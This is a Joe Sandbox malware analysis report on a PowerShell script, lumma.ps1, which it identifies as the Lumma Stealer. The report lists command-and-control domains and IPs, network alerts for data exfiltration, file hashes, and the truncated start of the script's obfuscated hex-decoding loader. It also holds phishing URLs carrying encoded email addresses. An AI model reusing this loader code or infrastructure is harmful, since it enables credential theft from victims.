                                                    https://github.com/mgravell/protobuf-netpowershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://advicebedsu.click:443/apipowershell.exe, 00000008.00000002.2633114961.0000000003072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2537626425.0000000004B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2616078952.0000000007180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/mgravell/protobuf-netipowershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://advicebedsu.click/XUrpowershell.exe, 00000008.00000002.2635830173.00000000030F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://advicebedsu.click/pipowershell.exe, 00000008.00000002.2633114961.0000000003066000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.microsoft.co-powershell.exe, 00000000.00000002.1812415946.0000016DE89F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://advicebedsu.click:443/apizpowershell.exe, 00000008.00000002.2633114961.0000000003072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://stackoverflow.com/q/2152978/23354powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://aka.ms/pscore6lBfqpowershell.exe, 00000002.00000002.2537626425.0000000004A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1807008792.0000016DE0804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1807008792.0000016DE0947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://advicebedsu.click/api8powershell.exe, 00000008.00000002.2635830173.00000000030F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.1782702388.0000016DD0791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.microsoft.$powershell.exe, 00000000.00000002.1811314226.0000016DE8922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1782702388.0000016DD0791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2537626425.0000000004A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://advicebedsu.click/powershell.exe, 00000008.00000002.2635830173.00000000030F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.84.241
                                                                        		advicebedsu.clickUnited States
                                                                        		13335CLOUDFLARENETUStrue
                                                                        104.21.72.190
                                                                        		cdn1.klipbazyxui.shopUnited States
                                                                        		13335CLOUDFLARENETUStrue

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1582291
                                                                        Start date and time:2024-12-30 09:17:05 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 7m 2s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:9
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:lumma.ps1
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winPS1@7/8@2/2
                                                                        EGA Information:
                                                                        • Successful, ratio: 66.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 96%
                                                                        • Number of executed functions: 196
                                                                        • Number of non-executed functions: 43
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .ps1
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                        • Stop behavior analysis, all processes terminated

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 20.109.210.53, 13.107.246.45
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        03:17:56API Interceptor94x Sleep call for process: powershell.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        104.21.84.241https://mont-resp.buzz/m/?cmFuZDE9VWtkRFluQlpaalJ3VEE9PSZzdj1vMzY1XzFfbm9tJnJhbmQyPVVWcG1lRFpGVFhjeGN3PT0mdWlkPVVTRVIwNDA2MjAyNFVOSVFVRTEwMzUwNjA0NDcyMDI0MjAyNDA2MDQzNTEwNDcmcmFuZDM9Tkdsc2MwTjZURlp2TWc9PQ==N0123N%5bEMail%5dGet hashmaliciousUnknownBrowse
                                                                          https://locksmithelpasotexas.com/wp-content/plugins/mqdrxkc/2Factor.html#YnJpYW4ud2lsbGlhbXNAa3JhZnRtYWlkLmNvbQ==&target=_blankGet hashmaliciousUnknownBrowse
                                                                            http://mail.elgrillo.mx/js/captcha.html#b2JkdWxpYS5zYW5jaGV6QGFuYWludGVyY29udGluZW50YWwtdG9reW8uanA=&target=_blankGet hashmaliciousUnknownBrowse
                                                                              https://plentyequipment.com/sign.html#UGV0ZXIuS3VlcHBlcnNAdmVyYmlvLmRl&referrer=nonreferrerGet hashmaliciousHTMLPhisherBrowse
                                                                                104.21.72.190Winter.mp4.htaGet hashmaliciousLummaCBrowse

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  cdn1.klipbazyxui.shopWinter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.72.190

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSvlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.190.223
                                                                                  sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.134.110
                                                                                  https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6aGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.1.101
                                                                                  https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6aGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.1.101
                                                                                  PersonnelPolicies.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                  • 104.17.245.203
                                                                                  botx.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 104.17.182.127
                                                                                  AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.205.168
                                                                                  R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.32.1
                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.80.1
                                                                                  CLOUDFLARENETUSvlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.190.223
                                                                                  sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.134.110
                                                                                  https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6aGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.1.101
                                                                                  https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6aGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.1.101
                                                                                  PersonnelPolicies.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                  • 104.17.245.203
                                                                                  botx.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 104.17.182.127
                                                                                  AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.205.168
                                                                                  R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.32.1
                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.80.1

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eGPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                  • 104.21.72.190
                                                                                  Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.72.190
                                                                                  aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.72.190
                                                                                  aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.72.190
                                                                                  VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                  • 104.21.72.190
                                                                                  SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                  • 104.21.72.190
                                                                                  l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.72.190
                                                                                  FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.72.190
                                                                                  tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.72.190
                                                                                  lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                  • 104.21.72.190
                                                                                  a0e9f5d64349fb13191bc781f81f42e1vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.84.241
                                                                                  AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.84.241
                                                                                  R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.84.241
                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.84.241
                                                                                  BasesRow.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.84.241
                                                                                  installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.84.241
                                                                                  @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.84.241
                                                                                  GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                  • 104.21.84.241
                                                                                  Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.84.241
                                                                                  MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.84.241

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):9434
                                                                                  Entropy (8bit):4.9287357903615305
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdQgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4Zjkjh4iUxsT6Ypib47
                                                                                  MD5:1A90203078D9A709A26D31BAA0CDB7C4
                                                                                  SHA1:A84D0053A4FC5A3B17D02CB27F53C9920E9007B2
                                                                                  SHA-256:788B7EFEA1DC3350F5CBB62B8EA8730FB0CABED347064C6CC75A9047AB057B49
                                                                                  SHA-512:8110B0AB271B0890A65C52C49161FED843C13BEE64A10F64997BB80A9E5F4996B8FCE69A4DD666010A69F76930A666DA1DA07625B0FC102F0EE6BA24ECB7CE99
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllulbnolz:NllUc
                                                                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:@...e................................................@..........

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hghxjfr.xyo.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aft0coal.ogt.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgz320r3.hoq.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zt20gfqe.ckx.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6221
                                                                                  Entropy (8bit):3.7448219545289696
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:RNOJ33CxH0dkvhkvCCtleKB/hHWeKB/hHx:RNOJyUJleKKeKF
                                                                                  MD5:2ED193AECFD32A9B966FCB779FE4D2DB
                                                                                  SHA1:74522CD7AC4E7AD9279938279EF25942CA0ABD78
                                                                                  SHA-256:8A3C8B95AD8438CB79A4A6016CA2923D04A19AEED8032B198C6487B1C61E389C
                                                                                  SHA-512:B577F5EC86A3A61AF7EECA352E0A4A401776BFFB3243EE42100D6C222CF18B5FCA96B08E5DE3C0B05509740B53A30456D02A909BD716BA6B2A0F862C1E783968
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...-/.v.......S.Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......O.Z.....S.Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y6B...........................%..A.p.p.D.a.t.a...B.V.1......Y9B..Roaming.@......CW.^.Y9B..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................%!.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y<B....Q...........

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5GTYAEWBPCSNDM2KMYFK.temp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6221
                                                                                  Entropy (8bit):3.7448219545289696
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:RNOJ33CxH0dkvhkvCCtleKB/hHWeKB/hHx:RNOJyUJleKKeKF
                                                                                  MD5:2ED193AECFD32A9B966FCB779FE4D2DB
                                                                                  SHA1:74522CD7AC4E7AD9279938279EF25942CA0ABD78
                                                                                  SHA-256:8A3C8B95AD8438CB79A4A6016CA2923D04A19AEED8032B198C6487B1C61E389C
                                                                                  SHA-512:B577F5EC86A3A61AF7EECA352E0A4A401776BFFB3243EE42100D6C222CF18B5FCA96B08E5DE3C0B05509740B53A30456D02A909BD716BA6B2A0F862C1E783968
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...-/.v.......S.Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......O.Z.....S.Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y6B...........................%..A.p.p.D.a.t.a...B.V.1......Y9B..Roaming.@......CW.^.Y9B..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................%!.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y<B....Q...........

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:ASCII text, with very long lines (3739), with no line terminators
                                                                                  Entropy (8bit):4.458326077198348
                                                                                  TrID:
                                                                                    File name:lumma.ps1
                                                                                    File size:3'739 bytes
                                                                                    MD5:e68c88b1be041d41149461edef165243
                                                                                    SHA1:1b15c0f200880630b8a7c5d7d8f4e54a54a8171e
                                                                                    SHA256:15f7511803399243beafdaecbc4cb3ad0dc25f97d9fafc6bead3147fdfbb3d66
                                                                                    SHA512:7e24dcb41fa620d439f1c75f254e14f3f4ba95078c73ec3f7793e85ba0197faee89e1edf1f628e188e2b323e3f11fa7da854c05e8e23c85cea72f81e2eccb041
                                                                                    SSDEEP:96:lwqbfN22gtOBkOfSuJXckiHrsnH0DcDSGqoKPVfW229zT:SWc2gtGB3XDiHy0DcDiNA
                                                                                    TLSH:4B711AD6612D06D60F9728A410663B8B6318CBF7963E0868263B6B0417E05F709BDFB5
                                                                                    File Content Preview:function OiHh($HJHQg){return -split ($HJHQg -replace '..', '0x$& ')};$JZsH = OiHh('1A9A57446742FA472A5382B631F7FA321E1A275772E9B23DAB5A78BAEA810A7314CC97B1E25466C4628E7A5AF62C3CB3665E3680CD05B5F065F7ED62C8E1E874060545040B3716B5AA5AD5F5096103553FB863FBBD39

                                                                                    File Icon

                                                                                    Icon Hash:3270d6baae77db44

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-12-30T09:19:23.830003+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449916104.21.84.241443TCP
                                                                                    2024-12-30T09:19:24.289204+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449916104.21.84.241443TCP
                                                                                    2024-12-30T09:19:24.289204+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449916104.21.84.241443TCP
                                                                                    2024-12-30T09:19:24.745174+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449922104.21.84.241443TCP
                                                                                    2024-12-30T09:19:25.342316+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449922104.21.84.241443TCP
                                                                                    2024-12-30T09:19:25.342316+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449922104.21.84.241443TCP
                                                                                    2024-12-30T09:19:25.981846+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449930104.21.84.241443TCP
                                                                                    2024-12-30T09:19:26.529167+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449930104.21.84.241443TCP
                                                                                    2024-12-30T09:19:26.985741+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449940104.21.84.241443TCP
                                                                                    2024-12-30T09:19:28.097403+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449947104.21.84.241443TCP
                                                                                    2024-12-30T09:19:29.202231+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449956104.21.84.241443TCP
                                                                                    2024-12-30T09:19:30.566083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449965104.21.84.241443TCP
                                                                                    2024-12-30T09:19:32.495395+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449977104.21.84.241443TCP
                                                                                    2024-12-30T09:19:32.940364+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449977104.21.84.241443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 30, 2024 09:18:05.852860928 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:05.852889061 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:05.853120089 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:05.863807917 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:05.863828897 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:06.315268993 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:06.315340996 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:06.320166111 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:06.320178032 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:06.320442915 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:06.343489885 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:06.387343884 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:06.724598885 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:06.724648952 CET44349730104.21.72.190192.168.2.4
